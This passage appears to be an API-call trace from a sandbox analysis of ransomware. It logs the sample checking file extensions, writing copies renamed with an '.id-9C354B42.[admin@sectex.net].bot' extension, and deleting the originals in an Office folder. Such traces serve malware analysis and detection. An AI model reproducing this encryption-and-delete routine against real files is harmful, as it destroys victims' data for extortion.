	[0148.857] lstrlenW (lpString=".7z") returned 3
	[0148.857] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString=".dbf") returned 4
	[0148.857] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.857] lstrlenW (lpString=".1cd") returned 4
	[0148.858] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_F_COL.HXK") returned 65
	[0148.858] lstrlenW (lpString=".jpg") returned 4
	[0148.858] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.858] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.858] lstrlenW (lpString="ONENOTE_K_COL.HXK") returned 17
	[0148.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.858] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=113) returned 1
	[0148.858] CloseHandle (hObject=0x3f4) returned 1
	[0148.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk")) returned 0x20
	[0148.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.859] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.859] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.860] GetLastError () returned 0x0
	[0148.860] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.861] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.862] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.862] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0148.862] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.862] CloseHandle (hObject=0x3d4) returned 1
	[0148.862] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.862] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.865] CloseHandle (hObject=0x3f4) returned 1
	[0148.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onenote_k_col.hxk")) returned 1
	[0148.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.868] lstrlenW (lpString=".doc") returned 4
	[0148.868] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.868] lstrlenW (lpString=".docx") returned 5
	[0148.868] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.868] lstrlenW (lpString=".pdf") returned 4
	[0148.868] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.868] lstrlenW (lpString=".xls") returned 4
	[0148.868] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.868] lstrlenW (lpString=".xlsx") returned 5
	[0148.868] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.868] lstrlenW (lpString=".ppt") returned 4
	[0148.868] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.868] lstrlenW (lpString=".zip") returned 4
	[0148.868] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.868] lstrlenW (lpString=".rar") returned 4
	[0148.868] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.868] lstrlenW (lpString=".bz2") returned 4
	[0148.868] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.868] lstrlenW (lpString=".7z") returned 3
	[0148.868] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.868] lstrlenW (lpString=".dbf") returned 4
	[0148.868] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.868] lstrlenW (lpString=".1cd") returned 4
	[0148.869] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.869] lstrlenW (lpString=".jpg") returned 4
	[0148.869] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.869] lstrlenW (lpString=".doc") returned 4
	[0148.869] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.869] lstrlenW (lpString=".docx") returned 5
	[0148.869] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.869] lstrlenW (lpString=".pdf") returned 4
	[0148.869] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString=".xls") returned 4
	[0148.869] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString=".xlsx") returned 5
	[0148.869] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.869] lstrlenW (lpString=".ppt") returned 4
	[0148.869] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.869] lstrlenW (lpString=".zip") returned 4
	[0148.869] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString=".rar") returned 4
	[0148.869] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.869] lstrlenW (lpString=".bz2") returned 4
	[0148.869] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.869] lstrlenW (lpString=".7z") returned 3
	[0148.869] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.869] lstrlenW (lpString=".dbf") returned 4
	[0148.869] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.870] lstrlenW (lpString=".1cd") returned 4
	[0148.870] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONENOTE_K_COL.HXK") returned 65
	[0148.870] lstrlenW (lpString=".jpg") returned 4
	[0148.870] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.870] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0148.870] lstrlenW (lpString="ONINTL.DLL") returned 10
	[0148.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.870] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=3415952) returned 1
	[0148.870] CloseHandle (hObject=0x3f4) returned 1
	[0148.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll")) returned 0x20
	[0148.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0148.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.871] lstrlenW (lpString=".doc") returned 4
	[0148.871] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString=".docx") returned 5
	[0148.871] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.871] lstrlenW (lpString=".pdf") returned 4
	[0148.871] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString=".xls") returned 4
	[0148.871] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString=".xlsx") returned 5
	[0148.871] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.871] lstrlenW (lpString=".ppt") returned 4
	[0148.871] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.871] lstrlenW (lpString=".zip") returned 4
	[0148.871] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString=".rar") returned 4
	[0148.871] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.871] lstrlenW (lpString=".bz2") returned 4
	[0148.871] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.871] lstrlenW (lpString=".7z") returned 3
	[0148.871] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString=".dbf") returned 4
	[0148.872] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString=".1cd") returned 4
	[0148.872] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString=".jpg") returned 4
	[0148.872] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString=".doc") returned 4
	[0148.872] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString=".docx") returned 5
	[0148.872] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.872] lstrlenW (lpString=".pdf") returned 4
	[0148.872] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString=".xls") returned 4
	[0148.872] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString=".xlsx") returned 5
	[0148.872] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.872] lstrlenW (lpString=".ppt") returned 4
	[0148.872] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.872] lstrlenW (lpString=".zip") returned 4
	[0148.872] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString=".rar") returned 4
	[0148.872] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.872] lstrlenW (lpString=".bz2") returned 4
	[0148.872] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.872] lstrlenW (lpString=".7z") returned 3
	[0148.872] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.873] lstrlenW (lpString=".dbf") returned 4
	[0148.873] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.873] lstrlenW (lpString=".1cd") returned 4
	[0148.873] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL") returned 58
	[0148.873] lstrlenW (lpString=".jpg") returned 4
	[0148.873] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.873] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0148.873] lstrlenW (lpString="ONINTL.DLL.IDX_DLL") returned 18
	[0148.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.873] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=15232) returned 1
	[0148.873] CloseHandle (hObject=0x3f4) returned 1
	[0148.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll")) returned 0x20
	[0148.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.874] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.874] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.875] GetLastError () returned 0x0
	[0148.875] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x3b80, lpOverlapped=0x0) returned 1
	[0148.876] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x3b90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x3b90, lpOverlapped=0x0) returned 1
	[0148.877] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.877] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0148.877] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.878] CloseHandle (hObject=0x3d4) returned 1
	[0148.878] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.878] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.880] CloseHandle (hObject=0x3f4) returned 1
	[0148.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.dll.idx_dll")) returned 1
	[0148.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.881] lstrlenW (lpString=".doc") returned 4
	[0148.881] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0148.881] lstrlenW (lpString=".docx") returned 5
	[0148.881] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0148.881] lstrlenW (lpString=".pdf") returned 4
	[0148.881] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0148.881] lstrlenW (lpString=".xls") returned 4
	[0148.881] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0148.881] lstrlenW (lpString=".xlsx") returned 5
	[0148.881] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0148.881] lstrlenW (lpString=".ppt") returned 4
	[0148.881] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0148.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString=".zip") returned 4
	[0148.882] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".rar") returned 4
	[0148.882] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".bz2") returned 4
	[0148.882] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".7z") returned 3
	[0148.882] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString=".dbf") returned 4
	[0148.882] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString=".1cd") returned 4
	[0148.882] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString=".jpg") returned 4
	[0148.882] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.882] lstrlenW (lpString=".doc") returned 4
	[0148.882] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".docx") returned 5
	[0148.882] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0148.882] lstrlenW (lpString=".pdf") returned 4
	[0148.882] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".xls") returned 4
	[0148.882] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString=".xlsx") returned 5
	[0148.882] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0148.882] lstrlenW (lpString=".ppt") returned 4
	[0148.882] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0148.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.883] lstrlenW (lpString=".zip") returned 4
	[0148.883] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0148.883] lstrlenW (lpString=".rar") returned 4
	[0148.883] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0148.883] lstrlenW (lpString=".bz2") returned 4
	[0148.883] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0148.883] lstrlenW (lpString=".7z") returned 3
	[0148.883] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.883] lstrlenW (lpString=".dbf") returned 4
	[0148.883] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0148.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.883] lstrlenW (lpString=".1cd") returned 4
	[0148.883] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0148.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.DLL.IDX_DLL") returned 66
	[0148.883] lstrlenW (lpString=".jpg") returned 4
	[0148.883] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0148.883] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0148.883] lstrlenW (lpString="ONINTL.REST.IDX_DLL") returned 19
	[0148.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.884] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=114560) returned 1
	[0148.884] CloseHandle (hObject=0x3f4) returned 1
	[0148.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll")) returned 0x20
	[0148.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.884] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.884] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
